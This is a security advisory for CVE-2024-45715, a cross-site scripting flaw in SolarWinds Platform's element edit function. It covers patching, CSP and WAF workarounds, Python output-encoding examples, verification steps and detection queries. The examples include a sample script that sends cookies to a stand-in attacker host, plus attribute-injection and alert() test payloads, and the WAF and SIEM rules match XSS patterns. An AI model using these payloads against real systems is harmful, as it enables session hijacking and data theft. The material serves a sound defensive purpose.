CVE-2024-45715
📋 TL;DR
This Cross-Site Scripting (XSS) vulnerability in SolarWinds Platform allows an attacker to inject malicious script through the edit operation on an existing element; the script then executes in the browser of a user who views or interacts with the affected content. If exploited, the attacker could steal session cookies, redirect users to malicious sites, or perform actions in the web console on behalf of the authenticated victim. Organizations running affected SolarWinds Platform versions are at risk.
💻 Affected Systems
- SolarWinds Platform
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could hijack an administrator's authenticated session, take full control of the SolarWinds Platform web console and its configuration, and use the platform's reach into the monitored network to pivot, deploy ransomware, or exfiltrate sensitive data.
Likely Case
Attackers steal session cookies to impersonate authenticated users, modify monitoring configuration, or read monitoring data and network inventory that helps them map the environment.
If Mitigated
With proper output encoding of edited values (and input validation as a second layer), injected script is rendered as literal text and never executes; the attempted payloads remain visible in the stored values and in request logs, which is useful for detection.
🎯 Exploit Status
XSS vulnerabilities typically have low exploitation complexity. This one requires an attacker who can perform edit operations on an element, plus user interaction: a victim who views the page carrying the injected content (stored XSS) or who follows a crafted link (reflected XSS). No exploit code is referenced on this page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check SolarWinds advisory for specific patched versions
Vendor Advisory: https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-45715
Restart Required: Yes
Instructions:
1. Log into SolarWinds Platform as an administrator.
2. Navigate to Settings > All Settings > Product Updates.
3. Check for available updates.
4. Download and apply the latest security patch.
5. Restart SolarWinds services as prompted.
🔧 Temporary Workarounds
Implement Content Security Policy (CSP)
Add CSP headers to restrict the sources from which script may execute and so reduce the impact of injected script.
Add to the web server configuration: Content-Security-Policy: default-src 'self'; script-src 'self'
Caveat: a policy without 'unsafe-inline' blocks the console's own inline scripts as well as injected ones, so roll it out first as Content-Security-Policy-Report-Only, review the violation reports, and only then enforce it. CSP limits the blast radius; it does not remove the vulnerability.
Input Validation Web Application Firewall (WAF) Rules
Configure the WAF to block XSS payload patterns in the parameters of the edit functions.
ModSecurity rule (the @detectXSS operator is libinjection's XSS detector; the transformations catch double-encoded and entity-encoded payloads):
SecRule ARGS "@detectXSS" "id:1001,phase:2,t:urlDecodeUni,t:htmlEntityDecode,log,deny,status:403,msg:'XSS pattern in request argument'"
Expect some false positives on legitimate edits that contain angle brackets, and remember that signature-based WAF rules can be bypassed; this is a stopgap, not a replacement for the patch.
🧯 If You Can't Patch
- Implement strict input validation and contextual output encoding in any custom code or integration that reads or renders values set through the edit functions
- Limit the number of accounts that can edit elements, since injection requires edit rights
- Restrict access to the SolarWinds Platform web interface through network segmentation and allow only trusted source IP addresses
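The "If Mitigated" and "If You Can't Patch" items above both rest on output encoding. The following added example (not code from the page or from SolarWinds) shows the vulnerable concatenation pattern next to the hardened form for three rendering contexts: HTML body, HTML attribute and a JavaScript string. The element names are constructed inputs standing in for what an attacker with edit rights might save.

```python
import html
import json

# Constructed inputs (hypothetical, not from the advisory): values an attacker
# with edit rights might save as an element's display name.
SCRIPT_NAME = "core-sw-01<script>location='https://attacker.example/?c='+document.cookie</script>"
ATTR_NAME = 'core-sw-01" onmouseover="alert(1)'


def render_unsafe(name: str) -> str:
    """Vulnerable pattern: the stored value is concatenated straight into the page."""
    return f"<td>{name}</td>"


def render_body(name: str) -> str:
    """HTML body context: entity-encode the significant characters (& < > quotes)
    so the browser treats the whole value as text, never as markup."""
    return f"<td>{html.escape(name, quote=True)}</td>"


def render_attribute(name: str) -> str:
    """Attribute context: the attribute must be quoted AND quotes must be encoded;
    either one alone lets the value add its own event-handler attribute."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def render_js_string(name: str) -> str:
    """JavaScript string context: HTML entities are not decoded inside <script>,
    so HTML encoding is the wrong tool here. Emit a JSON literal and hex-escape
    < and > so the value can never contain a literal </script> that would end
    the block early."""
    literal = json.dumps(name).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var nodeName = {literal};</script>"


if __name__ == "__main__":
    print(render_unsafe(SCRIPT_NAME))      # raw <script> tag reaches the browser
    print(render_body(SCRIPT_NAME))        # &lt;script&gt;... shown as text
    print(render_attribute(ATTR_NAME))     # &quot; keeps the value inside value=""
    print(render_js_string(SCRIPT_NAME))   # \u003cscript\u003e stays a string
```

The point of the three hardened functions is that the encoding must match the context the value lands in; a single "sanitize on input" pass cannot know that, which is why output encoding is the primary control and input validation only the second layer.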
🔍 How to Verify
Check if Vulnerable:
In a non-production instance (or using an element and account you control), edit an existing element and save a benign marker payload such as <script>alert('XSS')</script> in a text field, then view the element as another user. If the dialog fires, the instance is vulnerable. Remove the test value afterwards: an injection made through an edit operation is stored and will fire for every user who views that element.
Check Version:
In SolarWinds web interface: Help > About SolarWinds Platform
Verify Fix Applied:
After patching, repeat the same test and confirm the payload is rendered as literal, encoded text and does not execute.
📡 Detection & Monitoring
Log Indicators:
- Edit operations whose parameters contain script tags, event-handler attributes (onerror=, onload=, ...) or javascript: URIs, including their URL-encoded forms
- An existing session suddenly used from a new source IP address or user agent shortly after that user viewed an edited element, which is the signature of a stolen session cookie
Network Indicators:
- HTTP requests to edit endpoints containing script tags or JavaScript in their parameters
- Unexpected outbound connections from users' browsers (not from the SolarWinds server; the script runs client-side) to unfamiliar hosts immediately after viewing SolarWinds pages, especially requests carrying cookie values in the URL
SIEM Query (pseudo-syntax; decode URL-encoded parameter values before matching, or add the encoded variants as shown):
source="solarwinds" AND url="*edit*" AND (param="*<script*" OR param="*%3Cscript*" OR param="*javascript:*" OR param="*onerror=*")